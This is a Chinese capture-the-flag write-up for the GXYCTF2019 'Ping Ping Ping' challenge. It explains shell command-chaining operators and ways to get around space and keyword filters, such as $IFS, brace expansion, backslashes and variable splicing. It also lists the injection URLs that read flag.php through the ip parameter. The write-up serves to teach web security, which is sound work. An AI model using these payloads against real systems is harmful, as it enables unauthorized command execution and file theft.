web——[GXYCTF2019]Ping Ping Ping1——过滤和绕过

0x00 考点

0、命令联合执行

; 前面的执行完执行后面的

| 管道符,上一条命令的输出,作为下一条命令的参数(显示后面的执行结果)

|| 当前面的执行出错时(为假)执行后面的

& 将任务置于后台执行

&& 前面的语句为假则直接出错,后面的也不执行,前面只能为真

%0a (换行)

%0d (回车)

1、命令绕过空格方法有:

{IFS}9

{IFS}

$IFS

${IFS}

IFS1 //1改成加其他数字貌似都行

IFS

<

<>

{cat,flag.php} //用逗号实现了空格功能,需要用{}括起来

%20 (space)

%09 (tab)

X='cat\\x09./flag.php';X (\x09表示tab,也可以用\x20)

ps:有时会禁用cat:

解决方法是使用tac反向输出命令:

linux命令中可以加\,所以甚至可以ca\t /fl\ag

2、内联执行

内联,就是将反引号内命令的输出作为输入执行

?ip=127.0.0.1;catIFS9`ls`

$IFS在Linux下表示为空格

9是当前系统shell进程第九个参数持有者,始终为空字符串,后可以接任意数字

这里IFS9或IFS垂直,后面加个与{}类似,起截断作用

原文链接:https://blog.csdn.net/vanarrow/article/details/108295481

这个题先ping一下,可以ping通,直接ls看看

0ef4f16b-2de2-41d3-bfcf-6d06f7a9fb60.node5.buuoj.cn:81/?ip=127.0.0.1;ls

然后cat一下flag.php看看

wc,它骂我,额,,,是空格的过滤

0ef4f16b-2de2-41d3-bfcf-6d06f7a9fb60.node5.buuoj.cn:81/?ip=127.0.0.1;cat{IFS}flag.php

也过滤了{},用$IFS$1代替

flag.php里没有东西

在index.php里找找

代码审计

过滤了许多的字符

1.源码中有一个$a可以覆盖

?ip=127.0.0.1;a=f;catIFS1$alag.php 过滤

?ip=127.0.0.1;a=l;catIFS1f$aag.php 没flag

?ip=127.0.0.1;a=a;catIFS1fl$ag.php 过滤

?ip=127.0.0.1;a=g;catIFS1fla$a.php 有flag

?ip=127.0.0.1;a=fl;b=ag;catIFS1ab.php 过滤

?ip=127.0.0.1;b=ag;a=fl;catIFS1ab.php 有flag

使用ctrl+u查看源码

、变量ab互换传递,绕过字符串匹配,实现拼接

复制代码
?ip=127.0.0.1;b=ag;a=fl;cat$IFS$1$a$b.php

?ip=127.0.0.1;b=lag;a=f;cat$IFS$a$b.php
相关推荐
Justin3go4 小时前
HUNT0 上线了——尽早发布,尽早发现
前端·后端·程序员
怕浪猫5 小时前
第一章 JSX 增强特性与函数组件入门
前端·javascript·react.js
铅笔侠_小龙虾5 小时前
Emmet 常用用法指南
前端·vue
钦拆大仁5 小时前
跨站脚本攻击XSS
前端·xss
VX:Fegn08956 小时前
计算机毕业设计|基于springboot + vue校园社团管理系统(源码+数据库+文档)
前端·数据库·vue.js·spring boot·后端·课程设计
ChangYan.7 小时前
直接下载源码但是执行npm run compile后报错
前端·npm·node.js
skywalk81637 小时前
在 FreeBSD 上可以使用的虚拟主机(Web‑Hosting)面板
前端·主机·webmin
ohyeah8 小时前
深入理解 React 中的 useRef:不只是获取 DOM 元素
前端·react.js
MoXinXueWEB8 小时前
前端页面获取不到url上参数值
前端
低保和光头哪个先来8 小时前
场景6:对浏览器内核的理解
开发语言·前端·javascript·vue.js·前端框架